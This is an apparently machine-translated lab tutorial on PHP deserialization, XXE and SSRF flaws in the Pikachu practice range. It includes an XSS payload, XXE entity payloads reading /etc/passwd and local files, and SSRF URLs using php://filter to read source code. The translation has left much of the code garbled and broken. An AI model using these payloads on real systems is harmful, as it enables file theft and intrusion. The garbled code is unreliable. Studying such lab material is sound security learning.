PHP deserialization
I. Overview
Before understanding this loophole, we need to figure out in php serialize (), unserialize () These two functions
Serialization serialize ()
Serialization popular point is the string may be transmitted into an object, such as the following is an object.
S {class
public Test $ = "Pikachu";
}
$ S = S new new (); // create an object
serialize ($ s); // this object serialization
result of the sequence obtained is like this: O: 1: "S": 1: {S:. 4: "Test"; S:. 7: "Pikachu";}
O: Representative object
1: represents the object length of the name of a character
S: name of the object
1: represents the object there is a variable
s: data type
length variable name:. 4
Test: variable name
s: data type
length value of the variable:. 7
Pikachu: variable value
Deserialization to unserialize ()
It is to be serialized string is reduced to the object, and then continue to use the following code.
to unserialize U = $ ( "O:. 1:" S ":. 1: {S:. 4:" Test "; S:. 7:" Pikachu ";}");
echo $ U-> Test; // result is obtained pikachu
Serialization and de-serialization itself is no problem, but if the content is deserialized user can control, and improper use of a background in PHP magic function will lead to security problems.
Several common magic function:
__construct () When an object is created is called
__destruct () When an object is destroyed is called
when an object is treated as a string using the __toString ()
before the object being serialized in __sleep () run
__wakeup will be called immediately after the sequence of
vulnerability Examples:
class S {
var Test $ = "Pikachu";
function __destruct () {
echo $ this-> Test;
}
}
$ = S $ _GET [ 'Test'];
@ $ Unser = to unserialize ($ A);
payload: O:. 1: "S":. 1: {S:. 4: "Test"; S: 29: "<Script> Alert ( 'XSS') </ Script>"; }
Two, PHP deserialization vulnerability
① There was observed cashback source acceptable excuse a deserialized objects, the parameters passed in the filter without any
② we use to generate a detailed code string deserialization.
<?php
class S{
var $test = "<script>alert('xss')</script>";
}
echo '<br>';
$a = new S();
echo serialize($a);
?>
③ create a new document, accessed through url
I am here localhost / pikachu-master / test.php
We ④ Right View Page Source
⑤ After the <br> O: 1: "S": 1: {s: 4: "test"; s: 29: "<script> alert ( 'xss') </ script>";} copied into the level, you can XSS attack
TWENTIETH
I. Overview
XXE - "xml external entity injection"
both "xml external entity injection vulnerability."
Summarize is "the attacker by injecting specified xml entity to the server content, allowing the server to perform in accordance with the specified configuration, cause problems."
That server receives and parses the xml data from the user side, but did not do rigorous security control, leading to an external entity xml injection.
Specific introduction to xml entities, there are many on the web, check yourself first.
Now many languages inside a corresponding analytic function is disabled by default xml parsing the content of external entities and, thus, avoid direct this vulnerability.
With PHP, for example, xml parsing in PHP which use the libxml, which ≥2.9.0 version, is disabled by default xml parsing the content of external entities.
xml is a scalable markup language, can be used to store data, for example: we often see some .xml file; it can also be used to transmit data, we can directly place data in xml format in which the request, to the server.
Specifically with regard to introduction xml entities , there are many on the web, check yourself first.
The first part: XML declaration section
<? Xml version = "1.0" ?>
Part II: Document Type Definition DTD
<DOCTYPE note [!
<- defined in this document is note type of document ->!
<ENTITY the Entity-name the SYSTEM "URI of the / the URL of">!
<- external entity declarations -! >
]>
第三部分:文档元素
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>
Which, DTD (Document Type Definition, Document Type Definition), XML documents used to define the syntax constraints can be declared inside can also reference an external DTD is now a function of many languages inside the corresponding xml parsing is disabled by default to resolve external entities content and, thus, avoid direct this vulnerability.
① internal DTD declaration format
<! DOCTYPE root element [element declaration]>
② external reference DTD format
<! DOCTYPE root element SYSTEM "outside the DTD URI">
③ cited public DTD format
<! DOCTYPE root element PUBLIC "DTD identifies the name of" "the public DTD URI">
External entity references Payload
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
Two, XXE vulnerability
① to enter a payload
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY hacker "ESHLkangi">
]>
<name>&hacker;</name>
The content of our entities defined print in the front
payload ② read the file structure
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///C://2.txt">
]>
<x>&f;</x>
SSRF
I. Overview
SSRF (Server-Side Request Forgery: server-side request forgery)
Reasons for its formation are mostly due to the server provides the ability to get data from other server applications, but do not target address filtering and strict restrictions
address an attacker can pass any back-end servers to let them initiate the request, and returns the data request to the target address
Data flow: the attacker -----> Server ----> destination address
Depending on the function used in the background, and the corresponding impact by the method have not the same
PHP improper use of the following functions will cause SSRF:
file_get_contents ()
fsockopen ()
curl_exec ()
If you must go to the specified address ( "or embedded in the front of the request") for resource requests by backend server for remote users, please do the filtering destination address.
Two, SSRE (curl)
IF (isset ($ _ GET [ 'url']) && $ _GET [ 'url']! = null) {
// URL receiver front-end is no problem, but to do the filtering, if not filtered, it will lead to SSRF
$ URL = $ _GET [ 'URL'];
$ CH = curl_init ($ the URL);
curl_setopt ($ CH, CURLOPT_HEADER, FALSE);
curl_setopt ($ CH, CURLOPT_SSL_VERIFYPEER, FALSE);
$ the RES = the curl_exec ($ CH);
curl_close ($ CH);
Q // ssrf is: url passed in the front end of the background is used the curl_exec () request performed, and the results returned to the request of the front end.
// In addition to http / https, curl also supports other protocols curl --version to see its support of the agreement, the Telnet
// curl support many protocols, there are FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and the LDAP
echo $ the RES;
}
We found the source of poetry found in the URL, and then I pikachu in this machine links the virtual machine, change the URL to access the files in the virtual machine 1.txt pikachu-master, the contents of the file is GOOD MAN
URL :( virtual machine IP is 192.168.233.138)
http://192.168.233.138/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.233.138/pikachu-master/1.txt
三、SSRF(file_get_content)
Then we click on the link, and found just the same
Look at the source code
// read the source code for PHP files: php: //filter/read=convert.base64-encode/resource=ssrf.php
within the network // request: HTTP: //xxxx/xx.index
IF (isset ($ _ GET [ 'File']) && $ _GET [ 'File'] = null)! {
$ filename = $ _GET [ 'File'];
$ STR = file_get_contents ($ filename);
echo $ STR;
}
>?
The above experiment except that the use file_get_contents
Read the PHP source file: php: //filter/read=convert.base64-encode/resource=ssrf.php
Intranet request: http: //xxxx/xx.index
So file_get_contents inside with php: // filter we use this source since you can read php
We construct this url
localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php
